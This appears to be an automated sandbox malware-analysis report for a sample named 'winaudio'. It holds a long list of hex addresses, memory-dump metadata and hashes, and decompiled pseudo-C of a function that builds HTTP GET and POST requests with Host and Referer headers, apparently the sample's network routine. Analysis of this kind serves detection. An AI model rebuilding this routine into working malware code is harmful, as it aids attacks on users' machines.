                        0x00394d44
                        0x00394d4b
                        0x00000000
                        0x00394d51
                        0x00394d57
                        0x00394d59
                        0x00394d5f
                        0x00394d5f
                        0x00394d61
                        0x00394d61
                        0x00394d63
                        0x00394d6c
                        0x00394d73
                        0x00394d76
                        0x00394d77
                        0x00394d79
                        0x00394d79
                        0x00394d81
                        0x00394d81
                        0x00394d83
                        0x00000000
                        0x00394d89
                        0x00394d89
                        0x00394d8f
                        0x00394d92
                        0x0039505c
                        0x0039505f
                        0x00395065
                        0x0039507a
                        0x0039507f
                        0x00395082
                        0x00394d98
                        0x00394d98
                        0x00394d9f
                        0x00000000
                        0x00394d9f
                        0x00394d92
                        0x00394d83
                        0x00394d4b
                        0x00394d21
                        0x00394d21
                        0x00394d23
                        0x00394d29
                        0x00394d2f
                        0x00394d30
                        0x00394fad
                        0x00394fad
                        0x00394fb4
                        0x00394fb5
                        0x00394fb6
                        0x00394fbb
                        0x00394fbe
                        0x00394fbe
                        0x00394fbe
                        0x00394d1f
                        0x00394fc0
                        0x00394fc0
                        0x00394fc2
                        0x00395089
                        0x00395090
                        0x00395097
                        0x003950aa
                        0x003950b0
                        0x003950b1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00394fc8
                        0x00394fce
                        0x00394fce
                        0x00394fd4
                        0x00394fd4
                        0x00394fe0
                        0x00000000
                        0x00394fe0
                        0x0039481d
                        0x0039481d
                        0x0039481f
                        0x00394825
                        0x00394827
                        0x0039482d
                        0x0039482f
                        0x00394ba6
                        0x00394ba6
                        0x00394ba8
                        0x00394bae
                        0x00394bb5
                        0x00394bb7
                        0x00394c16
                        0x00394c19
                        0x00394c1f
                        0x00394c25
                        0x00394c2b
                        0x00394c2d
                        0x00394c33
                        0x00394c35
                        0x00394c35
                        0x00394c37
                        0x00394c37
                        0x00394c39
                        0x00394c42
                        0x00394c49
                        0x00394c4c
                        0x00394c4d
                        0x00394c4f
                        0x00394c4f
                        0x00394c57
                        0x00394c59
                        0x00394c5f
                        0x00394c65
                        0x00394c68
                        0x00000000
                        0x00394c6e
                        0x00394c6e
                        0x00394c75
                        0x00394c75
                        0x00394c68
                        0x00394c59
                        0x00394c2d
                        0x00394bb9
                        0x00394bb9
                        0x00394bbb
                        0x00394bc1
                        0x00394bc7
                        0x00000000
                        0x00394bc7
                        0x00394bb7
                        0x00394835
                        0x00394835
                        0x00394835
                        0x00394838
                        0x0039483c
                        0x0039483c
                        0x0039483d
                        0x0039484f
                        0x0039485c
                        0x0039486b
                        0x00394895
                        0x0039489a
                        0x003948a0
                        0x003948a3
                        0x003948a9
                        0x003948ac
                        0x00394928
                        0x0039492f
                        0x003949f3
                        0x003949f9
                        0x003949ff
                        0x00394a02
                        0x00394a04
                        0x00394a8d
                        0x00394a0a
                        0x00394a0a
                        0x00394a10
                        0x00394a10
                        0x00394a16
                        0x00394a1c
                        0x00394a1e
                        0x00394a20
                        0x00394a20
                        0x00394a26
                        0x00394a2c
                        0x00394a2e
                        0x00394a36
                        0x00394a36
                        0x00394a3c
                        0x00394a3e
                        0x00394a40
                        0x00394a46
                        0x00394a48
                        0x00394b5f
                        0x00394b61
                        0x00394b67
                        0x00394b67
                        0x00000000
                        0x00394a4e
                        0x00394a54
                        0x00394a54
                        0x00394a56
                        0x00394a5c
                        0x00394a5f
                        0x00394a66
                        0x00394a6c
                        0x00394a6e
                        0x00394a95
                        0x00394a97
                        0x00394a99
                        0x00394a9b
                        0x00394aa1
                        0x00394aa7
                        0x00394b41
                        0x00394b41
                        0x00394b44
                        0x00000000
                        0x00394b4a
                        0x00394b4a
                        0x00394b50
                        0x00000000
                        0x00394b50
                        0x00394aad
                        0x00394aad
                        0x00394aad
                        0x00394ab0
                        0x00000000
                        0x00000000
                        0x00394ab2
                        0x00394ab4
                        0x00394ab6
                        0x00394abf
                        0x00394abf
                        0x00394ac1
                        0x00394ac7
                        0x00394ac7
                        0x00394ad3
                        0x00394ade
                        0x00394ae1
                        0x00394aee
                        0x00394af1
                        0x00394af2
                        0x00394af3
                        0x00394af9
                        0x00394afb
                        0x00394b01
                        0x00394b07
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00394b09
                        0x00394b09
                        0x00394b09
                        0x00394b0b
                        0x00000000
                        0x00000000
                        0x00394b0d
                        0x00394b10
                        0x00394bca
                        0x00394bca
                        0x00394bcc
                        0x00394bd2
                        0x00394bd8
                        0x00394bd9
                        0x00000000
                        0x00394b16
                        0x00394b16
                        0x00394b18
                        0x00394b1a
                        0x00394b1a
                        0x00394b1a
                        0x00394b22
                        0x00394b25
                        0x00394b25
                        0x00394b2b
                        0x00394b2d
                        0x00394b2f
                        0x00394b36
                        0x00394b3c
                        0x00394b3e
                        0x00000000
                        0x00394b3e
                        0x00000000
                        0x00394b10
                        0x00000000
                        0x00394b09
                        0x00000000
                        0x00394aad
                        0x00394a70
                        0x00394a70
                        0x00394a72
                        0x00394a78
                        0x00394a7f
                        0x00394a7f
                        0x00394a82
                        0x00394a82
                        0x00000000
                        0x00394a72
                        0x00000000
                        0x00394b56
                        0x00394b56
                        0x00394b57
                        0x00394b57
                        0x00000000
                        0x00394a5c
                        0x00394935
                        0x00394935
                        0x00394947
                        0x00394956
                        0x0039495b
                        0x0039495e
                        0x00394960
                        0x0039497c
                        0x0039497f
                        0x00000000
                        0x00394985
                        0x00394985
                        0x0039498c
                        0x00000000
                        0x00394992
                        0x00394998
                        0x0039499a
                        0x003949a0
                        0x003949a0
                        0x003949a2
                        0x003949a2
                        0x003949a4
                        0x003949ad
                        0x003949b4
                        0x003949b7
                        0x003949b8
                        0x003949ba
                        0x003949ba
                        0x00000000
                        0x003949a2
                        0x0039498c
                        0x00394962
                        0x00394964
                        0x0039496a
                        0x00394970
                        0x00394971
                        0x00000000
                        0x00394971
                        0x00394960
                        0x003948ae
                        0x003948ae
                        0x003948b4
                        0x003948b6
                        0x003948cb
                        0x003948ce
                        0x00000000
                        0x003948d4
                        0x003948d4
                        0x003948db
                        0x00000000
                        0x003948e1
                        0x003948e7
                        0x003948e9
                        0x003948ef
                        0x003948ef
                        0x003948f1
                        0x003948f1
                        0x003948f3
                        0x003948fc
                        0x00394903
                        0x00394906
                        0x00394907
                        0x00394909
                        0x00394909
                        0x003949c2
                        0x003949c2
                        0x003949c4
                        0x00000000
                        0x003949ca
                        0x003949ca
                        0x003949d0
                        0x003949d3
                        0x00394916
                        0x0039491d
                        0x00000000
                        0x003949d9
                        0x003949db
                        0x003949e1
                        0x003949e7
                        0x003949e8
                        0x00394bdf
                        0x00394bdf
                        0x00394be6
                        0x00394be7
                        0x00394be8
                        0x00394bed
                        0x00394bf0
                        0x00394bf0
                        0x003949d3
                        0x003949c4
                        0x003948db
                        0x003948b8
                        0x003948b8
                        0x003948ba
                        0x003948c0
                        0x00394b6a
                        0x00394b6a
                        0x00394b6b
                        0x00394b71
                        0x00394b71
                        0x00394b78
                        0x00394b79
                        0x00394b7a
                        0x00394b7f
                        0x00394b82
                        0x00394b82
                        0x00394b82
                        0x003948b6
                        0x00394b84
                        0x00394b84
                        0x00394b86
                        0x00394bf4
                        0x00394bfb
                        0x00394bfb
                        0x00394bfb
                        0x00394c02
                        0x00394c04
                        0x00394c0a
                        0x00394c0b
                        0x003950b7
                        0x003950b7
                        0x003950b8
                        0x003950b9
                        0x003950be
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00394b88
                        0x00394b8e
                        0x00394b8e
                        0x00394b94
                        0x00394b94
                        0x00394ba0
                        0x00000000
                        0x00394ba0
                        0x0039482f
                        0x003950c1
                        0x003950c1
                        0x003950c7
                        0x003950c9
                        0x003950cf
                        0x003950d5
                        0x003950d7
                        0x003950d9
                        0x003950db
                        0x003950db
                        0x003950dd
                        0x003950dd
                        0x003950e6
                        0x003950e7
                        0x003950eb
                        0x003950f2
                        0x003950f5
                        0x003950f6
                        0x003950f8
                        0x003950f8
                        0x003950fc
                        0x00395102
                        0x00395104
                        0x0039510a
                        0x0039510c
                        0x00395112
                        0x00395115
                        0x00395128
                        0x0039512b
                        0x00395131
                        0x00395146
                        0x0039514b
                        0x00395117
                        0x00395119
                        0x00395120
                        0x00395120
                        0x00395115
                        0x0039514e
                        0x0039514e
                        0x0039515e
                        0x00395167
                        0x00395168
                        0x0039516a
                        0x00395201
                        0x00395203
                        0x0039520e
                        0x0039520e
                        0x00395210
                        0x00395213
                        0x00395215
                        0x00000000
                        0x00395205
                        0x0039520b
                        0x0039520b
                        0x00395170
                        0x00395170
                        0x00395176
                        0x00395179
                        0x0039517f
                        0x00395182
                        0x00395188
                        0x0039518a
                        0x00395190
                        0x00395192
                        0x00395194
                        0x00395194
                        0x00395196
                        0x00395196
                        0x003951a3
                        0x003951aa
                        0x003951ad
                        0x003951ae
                        0x003951b0
                        0x003951b1
                        0x003951b1
                        0x003951b5
                        0x003951bb
                        0x003951bd
                        0x003951bf
                        0x003951c5
                        0x003951c8
                        0x003951dc
                        0x003951e2
                        0x003951f7
                        0x003951fc
                        0x003951ca
                        0x003951ca
                        0x003951d1
                        0x003951d1
                        0x003951c8
                        0x003951bd
                        0x0039521b
                        0x0039521b
                        0x0039521b
                        0x00395227
                        0x0039522a
                        0x00395230
                        0x00395232
                        0x00395234
                        0x0039523a
                        0x0039523c
                        0x0039523c
                        0x0039523c
                        0x0039523a
                        0x00395241
                        0x00395242
                        0x00395244
                        0x00395246
                        0x00395246
                        0x00395248
                        0x0039524e
                        0x00395254
                        0x00395256
                        0x0039525c
                        0x0039525c
                        0x00395262
                        0x00395264
                        0x00000000
                        0x00000000
                        0x0039526a
                        0x0039526c
                        0x0039526e
                        0x0039526e
                        0x00395270
                        0x00395270
                        0x00395280
                        0x00395287
                        0x0039528a
                        0x0039528b
                        0x0039528d
                        0x0039528d
                        0x00395291
                        0x00395297
                        0x00395299
                        0x0039529b
                        0x003952a1
                        0x003952a4
                        0x003952b5
                        0x003952b8
                        0x003952be
                        0x003952d3
                        0x003952d8
                        0x003952a6
                        0x003952a6
                        0x003952ad
                        0x003952ad
                        0x003952a4
                        0x003952e9
                        0x003952f8
                        0x003952f9
                        0x003952f9
                        0x003952fb
                        0x003952fd
                        0x003952fd
                        0x00395303
                        0x00395306
                        0x00395308
                        0x0039530a
                        0x0039530a
                        0x0039530d
                        0x0039530e
                        0x0039530e
                        0x00395313
                        0x00395316
                        0x0039531a
                        0x0039531a
                        0x0039531b
                        0x0039531d
                        0x00395323
                        0x00395329
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00395329
                        0x0039525c
                        0x0039532f
                        0x0039532f
                        0x00000000
                        0x0039532f
                        0x003940b4
                        0x003940ab
                        0x003940a2
                        0x00394059
                        0x0039405d
                        0x00394065
                        0x00000000
                        0x00394067
                        0x0039406d
                        0x00394072
                        0x0039534e
                        0x0039534e
                        0x00395351
                        0x0039535c
                        0x00395387
                        0x00395388
                        0x00395389
                        0x0039538a
                        0x0039538b
                        0x0039538c
                        0x00395391
                        0x00395394
                        0x00395397
                        0x0039539a
                        0x0039539c
                        0x0039539e
                        0x003953a0
                        0x003953a0
                        0x003953a3
                        0x00000000
                        0x00000000
                        0x003953a5
                        0x003953a6
                        0x003953aa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003953aa
                        0x003953a0
                        0x003953ad
                        0x003953ad
                        0x0039535e
                        0x0039535e
                        0x0039535e
                        0x00395366
                        0x00395368
                        0x00395371
                        0x00395376
                        0x00395384
                        0x00395384
                        0x0039535c
                        0x00394065

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 679b65a60882246717e8ffd6247a40f1ffac2c4e34eab07606d2aade53bd2008
                        • Instruction ID: 5aa8a6361ae43a18402b16496532323714d94671ffe58672481627f6209442cc
                        • Opcode Fuzzy Hash: 679b65a60882246717e8ffd6247a40f1ffac2c4e34eab07606d2aade53bd2008
                        • Instruction Fuzzy Hash: 4CC22A71E086298FDF26CE28DD40BEAB7B9EB45305F1545EAD44DE7240E774AE828F40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D5210 Relevance: 9.6, APIs: 1, Strings: 5, Instructions: 589sleepCOMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E002D5210(void* __ebx, intOrPtr __ecx, void* __edi) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed char _v48;
				intOrPtr _v52;
				signed int _v56;
				signed char _v72;
				intOrPtr _v76;
				signed int _v80;
				signed char _v96;
				intOrPtr _v100;
				signed int _v104;
				signed char _v120;
				intOrPtr _v124;
				signed int _v128;
				signed char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* __esi;
				void* __ebp;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				void* _t168;
				signed int _t169;
				signed int _t175;
				signed int _t177;
				char* _t180;
				signed int _t181;
				char* _t183;
				signed int _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				signed char _t192;
				signed char _t197;
				char* _t201;
				signed int _t206;
				void* _t207;
				signed int _t208;
				char* _t211;
				char* _t214;
				signed int _t215;
				char* _t218;
				char* _t221;
				signed int _t222;
				char* _t224;
				signed int _t225;
				signed int _t227;
				char* _t230;
				signed int _t231;
				char* _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				signed char _t242;
				signed char _t246;
				signed char _t250;
				char* _t252;
				char* _t255;
				signed int _t256;
				char* _t258;
				signed int _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				char* _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed char _t283;
				void* _t284;
				signed char _t285;
				void* _t286;
				intOrPtr* _t289;
				intOrPtr* _t293;
				char* _t294;
				signed int _t295;
				intOrPtr* _t298;
				intOrPtr* _t299;
				signed int _t300;
				char* _t302;
				signed int _t303;
				char* _t307;
				signed int _t308;
				char* _t310;
				signed int _t311;
				signed char _t314;
				void* _t315;
				signed char _t316;
				void* _t317;
				signed char _t318;
				void* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				signed int _t322;
				intOrPtr* _t324;
				signed int _t325;
				intOrPtr* _t329;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t337;
				intOrPtr* _t338;
				intOrPtr* _t339;
				intOrPtr* _t340;
				signed int _t343;
				char* _t345;
				void* _t346;
				signed int _t348;
				signed int _t350;
				intOrPtr _t351;
				intOrPtr* _t353;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
				intOrPtr* _t358;
				intOrPtr* _t359;
				intOrPtr* _t361;
				intOrPtr* _t362;
				intOrPtr* _t363;
				void* _t364;
				intOrPtr _t365;
				intOrPtr* _t367;
				intOrPtr* _t368;
				intOrPtr* _t369;
				intOrPtr* _t370;
				intOrPtr* _t371;

				_t348 = _t350;
				_push(0xffffffff);
				_push(0x39c703);
				_push( *[fs:0x0]);
				_t351 = _t350 - 0x90;
				_t164 =  *0x3e1008; // 0x847b54ee
				_t165 = _t164 ^ _t348;
				_v24 = _t165;
				_push(__ebx);
				_push(_t345);
				_push(__edi);
				_push(_t165);
				 *[fs:0x0] =  &_v16;
				_v20 = _t351;
				_t266 = __ecx;
				_v160 = __ecx;
				_t343 = 0;
				while( *((char*)(_t266 + 0xd)) == 0) {
					_v8 = 0;
					_t328 =  *((intOrPtr*)(_t266 + 0x10));
					E002D1240( &_v48,  *((intOrPtr*)(_t266 + 0x10)));
					_v8 = 1;
					_t175 =  *0x3ebb04; // 0x6556
					_t177 =  >  ? 0 : _t175 + 2;
					 *0x3ebb04 = _t177;
					 *0x3f0830 = _t177 & 0x00000019 | 0x000000e0;
					if(_v32 != 0) {
						_t353 = _t351 - 0x18;
						_t329 = _t353;
						_v152 = _t353;
						 *((intOrPtr*)(_t329 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t329 + 0x10)) = 0;
						__eflags =  *((intOrPtr*)(_t329 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t329 + 0x14)) < 0x10) {
							_t180 = _t329;
						} else {
							_t180 =  *_t329;
						}
						 *_t180 = 0;
						__eflags = "Host"; // 0x48
						if(__eflags != 0) {
							_t277 = "Host";
							_t345 =  &(_t277[1]);
							do {
								_t181 =  *_t277;
								_t277 =  &(_t277[1]);
								__eflags = _t181;
							} while (_t181 != 0);
							_t278 = _t277 - _t345;
							__eflags = _t278;
						} else {
							_t278 = 0;
						}
						_push(_t278);
						E002D0860(_t266, _t329, "Host");
						_t354 = _t353 - 0x18;
						_v8 = 2;
						_t280 = _t354;
						 *((intOrPtr*)(_t280 + 0x14)) = 0xf;
						 *(_t280 + 0x10) = 0;
						__eflags =  *((intOrPtr*)(_t280 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t280 + 0x14)) < 0x10) {
							_t183 = _t280;
						} else {
							_t183 =  *_t280;
						}
						_push(0xffffffff);
						 *_t183 = 0;
						_push(0);
						E002D0960(_t266, _t280,  &_v48);
						_v8 = 1;
						E002CFAE0(_t266,  &_v120, _t343, _t345, __eflags);
						_t355 = _t354 + 0x30;
						_v8 = 3;
						__eflags = _v104;
						if(_v104 != 0) {
							_t356 = _t355 - 0x18;
							_t289 = _t356;
							 *((intOrPtr*)(_t289 + 0x14)) = 0xf;
							 *(_t289 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t289 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t289 + 0x14)) < 0x10) {
								_t201 = _t289;
							} else {
								_t201 =  *_t289;
							}
							_push(0xffffffff);
							 *_t201 = 0;
							_push(0);
							E002D0960(_t266, _t289,  &_v120);
							E002DA8E0(_t266,  &_v144, _t329, _t343);
							_v76 = 0xf;
							_v80 = 0;
							_v96 = 0;
							_v52 = 0xf;
							_v56 = 0;
							_v72 = 0;
							_v8 = 6;
							E002D95C0(_t266,  &_v144,  &_v96, _t343);
							_t206 =  *0x3ebb10; // 0x6556
							_t207 = _t206 + 2;
							__eflags = _t207 - 0x1490;
							_t208 =  >  ? 0 : _t207;
							_t358 = _t356 + 0x18 - 0x18;
							_t293 = _t358;
							 *0x3ebb10 = _t208;
							_v148 = _t358;
							 *0x3f0830 = _t208 & 0x00000019 | 0x000000e0;
							 *((intOrPtr*)(_t293 + 0x14)) = 0xf;
							 *(_t293 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t293 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t293 + 0x14)) < 0x10) {
								_t211 = _t293;
							} else {
								_t211 =  *_t293;
							}
							_push(0xffffffff);
							 *_t211 = 0;
							_push(0);
							E002D0960(_t266, _t293,  &_v144);
							_t359 = _t358 - 0x18;
							_v8 = 7;
							_t332 = _t359;
							 *((intOrPtr*)(_t332 + 0x14)) = 0xf;
							 *(_t332 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t332 + 0x14)) < 0x10) {
								_t214 = _t332;
							} else {
								_t214 =  *_t332;
							}
							 *_t214 = 0;
							__eflags = "Host";
							if("Host" != 0) {
								_t294 = "Host";
								_t345 =  &(_t294[1]);
								do {
									_t215 =  *_t294;
									_t294 =  &(_t294[1]);
									__eflags = _t215;
								} while (_t215 != 0);
								_t295 = _t294 - _t345;
								__eflags = _t295;
							} else {
								_t295 = 0;
							}
							_push(_t295);
							E002D0860(_t266, _t332, "Host");
							_v8 = 6;
							E002CFCB0(_t266,  &_v48, _t343, __eflags);
							_t361 = _t359 + 0x30 - 0x18;
							_t298 = _t361;
							_v148 = _t361;
							 *((intOrPtr*)(_t298 + 0x14)) = 0xf;
							 *(_t298 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t298 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t298 + 0x14)) < 0x10) {
								_t218 = _t298;
							} else {
								_t218 =  *_t298;
							}
							_push(0xffffffff);
							 *_t218 = 0;
							_push(0);
							E002D0960(_t266, _t298,  &_v96);
							_t362 = _t361 - 0x18;
							_v8 = 8;
							_t333 = _t362;
							_v152 = _t362;
							 *((intOrPtr*)(_t333 + 0x14)) = 0xf;
							 *(_t333 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t333 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t333 + 0x14)) < 0x10) {
								_t221 = _t333;
							} else {
								_t221 =  *_t333;
							}
							 *_t221 = 0;
							__eflags =  *" HTTP";
							if( *" HTTP" != 0) {
								_t299 = " HTTP";
								_t345 = _t299 + 1;
								do {
									_t222 =  *_t299;
									_t299 = _t299 + 1;
									__eflags = _t222;
								} while (_t222 != 0);
								_t300 = _t299 - _t345;
								__eflags = _t300;
							} else {
								_t300 = 0;
							}
							_push(_t300);
							E002D0860(_t266, _t333, " HTTP");
							_t363 = _t362 - 0x18;
							_v8 = 9;
							_t334 = _t363;
							 *((intOrPtr*)(_t334 + 0x14)) = 0xf;
							 *(_t334 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t334 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t334 + 0x14)) < 0x10) {
								_t224 = _t334;
							} else {
								_t224 =  *_t334;
							}
							 *_t224 = 0;
							__eflags = "GET ";
							if("GET " != 0) {
								_t302 = "GET ";
								_t345 =  &(_t302[1]);
								do {
									_t225 =  *_t302;
									_t302 =  &(_t302[1]);
									__eflags = _t225;
								} while (_t225 != 0);
								_t303 = _t302 - _t345;
								__eflags = _t303;
							} else {
								_t303 = 0;
							}
							_push(_t303);
							E002D0860(_t266, _t334, "GET ");
							_v8 = 6;
							_t227 = E002CFE90(_t266,  &_v48,  &_v72, _t343);
							_t364 = _t363 + 0x48;
							__eflags = _t227;
							if(_t227 == 0) {
								_t369 = _t364 - 0x18;
								_t320 = _t369;
								_v156 = _t369;
								 *((intOrPtr*)(_t320 + 0x14)) = 0xf;
								 *(_t320 + 0x10) = 0;
								__eflags =  *((intOrPtr*)(_t320 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t320 + 0x14)) < 0x10) {
									_t252 = _t320;
								} else {
									_t252 =  *_t320;
								}
								_push(0xffffffff);
								 *_t252 = 0;
								_push(0);
								E002D0960(_t266, _t320,  &_v96);
								_t370 = _t369 - 0x18;
								_v8 = 0xa;
								_t339 = _t370;
								_v148 = _t370;
								 *((intOrPtr*)(_t339 + 0x14)) = 0xf;
								 *(_t339 + 0x10) = 0;
								__eflags =  *((intOrPtr*)(_t339 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t339 + 0x14)) < 0x10) {
									_t255 = _t339;
								} else {
									_t255 =  *_t339;
								}
								 *_t255 = 0;
								__eflags =  *" HTTP";
								if( *" HTTP" != 0) {
									_t321 = " HTTP";
									_t345 = _t321 + 1;
									do {
										_t256 =  *_t321;
										_t321 = _t321 + 1;
										__eflags = _t256;
									} while (_t256 != 0);
									_t322 = _t321 - _t345;
									__eflags = _t322;
								} else {
									_t322 = 0;
								}
								_push(_t322);
								E002D0860(_t266, _t339, " HTTP");
								_t371 = _t370 - 0x18;
								_v8 = 0xb;
								_t340 = _t371;
								 *((intOrPtr*)(_t340 + 0x14)) = 0xf;
								 *(_t340 + 0x10) = 0;
								__eflags =  *((intOrPtr*)(_t340 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t340 + 0x14)) < 0x10) {
									_t258 = _t340;
								} else {
									_t258 =  *_t340;
								}
								 *_t258 = 0;
								__eflags =  *"POST ";
								if( *"POST " != 0) {
									_t324 = "POST ";
									_t345 = _t324 + 1;
									do {
										_t259 =  *_t324;
										_t324 = _t324 + 1;
										__eflags = _t259;
									} while (_t259 != 0);
									_t325 = _t324 - _t345;
									__eflags = _t325;
								} else {
									_t325 = 0;
								}
								_push(_t325);
								E002D0860(_t266, _t340, "POST ");
								_v8 = 6;
								E002CFE90(_t266,  &_v48,  &_v72, _t343);
								_t364 = _t371 + 0x48;
							}
							_t365 = _t364 - 0x18;
							_v156 = _t365;
							E002D4D50(_t365,  &_v120,  &_v72);
							_t367 = _t365 + 4 - 0x18;
							_v8 = 0xc;
							_t337 = _t367;
							_v148 = _t367;
							 *((intOrPtr*)(_t337 + 0x14)) = 0xf;
							 *(_t337 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t337 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t337 + 0x14)) < 0x10) {
								_t230 = _t337;
							} else {
								_t230 =  *_t337;
							}
							 *_t230 = 0;
							__eflags = "Host";
							if("Host" != 0) {
								_t307 = "Host";
								_t345 =  &(_t307[1]);
								do {
									_t231 =  *_t307;
									_t307 =  &(_t307[1]);
									__eflags = _t231;
								} while (_t231 != 0);
								_t308 = _t307 - _t345;
								__eflags = _t308;
							} else {
								_t308 = 0;
							}
							_push(_t308);
							E002D0860(_t266, _t337, "Host");
							_t368 = _t367 - 0x18;
							_v8 = 0xd;
							_t338 = _t368;
							 *((intOrPtr*)(_t338 + 0x14)) = 0xf;
							 *(_t338 + 0x10) = 0;
							__eflags =  *((intOrPtr*)(_t338 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t338 + 0x14)) < 0x10) {
								_t233 = _t338;
							} else {
								_t233 =  *_t338;
							}
							 *_t233 = 0;
							__eflags = "Referer";
							if("Referer" != 0) {
								_t310 = "Referer";
								_t345 =  &(_t310[1]);
								do {
									_t234 =  *_t310;
									_t310 =  &(_t310[1]);
									__eflags = _t234;
								} while (_t234 != 0);
								_t311 = _t310 - _t345;
								__eflags = _t311;
							} else {
								_t311 = 0;
							}
							_push(_t311);
							E002D0860(_t266, _t338, "Referer");
							_v8 = 6;
							E002D0070(_t266,  &_v48, _t343, __eflags);
							_v8 = 5;
							_t355 = _t368 + 0x48;
							_t237 = _v52;
							__eflags = _t237 - 0x10;
							if(_t237 >= 0x10) {
								_t318 = _v72;
								__eflags = _t237 + 1 - 0x1000;
								if(_t237 + 1 >= 0x1000) {
									__eflags = _t318 & 0x0000001f;
									if(__eflags != 0) {
										E0037F981(_t266, _t318, _t343, __eflags);
									}
									_t250 =  *(_t318 - 4);
									__eflags = _t250 - _t318;
									if(__eflags >= 0) {
										_t250 = E0037F981(_t266, _t318, _t343, __eflags);
									}
									_t319 = _t318 - _t250;
									__eflags = _t319 - 4;
									if(__eflags < 0) {
										_t250 = E0037F981(_t266, _t319, _t343, __eflags);
									}
									__eflags = _t319 - 0x23;
									if(__eflags > 0) {
										_t250 = E0037F981(_t266, _t319, _t343, __eflags);
									}
									_t318 = _t250;
								}
								L002E05B1(_t318);
								_t355 = _t355 + 4;
							}
							_v8 = 4;
							_t238 = _v76;
							_v52 = 0xf;
							_v56 = 0;
							_v72 = 0;
							__eflags = _t238 - 0x10;
							if(_t238 >= 0x10) {
								_t316 = _v96;
								__eflags = _t238 + 1 - 0x1000;
								if(_t238 + 1 >= 0x1000) {
									__eflags = _t316 & 0x0000001f;
									if(__eflags != 0) {
										E0037F981(_t266, _t316, _t343, __eflags);
									}
									_t246 =  *(_t316 - 4);
									__eflags = _t246 - _t316;
									if(__eflags >= 0) {
										_t246 = E0037F981(_t266, _t316, _t343, __eflags);
									}
									_t317 = _t316 - _t246;
									__eflags = _t317 - 4;
									if(__eflags < 0) {
										_t246 = E0037F981(_t266, _t317, _t343, __eflags);
									}
									__eflags = _t317 - 0x23;
									if(__eflags > 0) {
										_t246 = E0037F981(_t266, _t317, _t343, __eflags);
									}
									_t316 = _t246;
								}
								L002E05B1(_t316);
								_t355 = _t355 + 4;
							}
							_v8 = 3;
							_t239 = _v124;
							_v76 = 0xf;
							_v80 = 0;
							_v96 = 0;
							__eflags = _t239 - 0x10;
							if(_t239 >= 0x10) {
								_t314 = _v144;
								__eflags = _t239 + 1 - 0x1000;
								if(_t239 + 1 >= 0x1000) {
									__eflags = _t314 & 0x0000001f;
									if(__eflags != 0) {
										E0037F981(_t266, _t314, _t343, __eflags);
									}
									_t242 =  *(_t314 - 4);
									__eflags = _t242 - _t314;
									if(__eflags >= 0) {
										_t242 = E0037F981(_t266, _t314, _t343, __eflags);
									}
									_t315 = _t314 - _t242;
									__eflags = _t315 - 4;
									if(__eflags < 0) {
										_t242 = E0037F981(_t266, _t315, _t343, __eflags);
									}
									__eflags = _t315 - 0x23;
									if(__eflags > 0) {
										_t242 = E0037F981(_t266, _t315, _t343, __eflags);
									}
									_t314 = _t242;
								}
								L002E05B1(_t314);
								_t355 = _t355 + 4;
							}
							_v124 = 0xf;
							_v128 = 0;
							_v144 = 0;
						}
						__eflags = _v28 - 0x10;
						_t328 =  >=  ? _v48 :  &_v48;
						 *0x3f0830 = 0x7ff7;
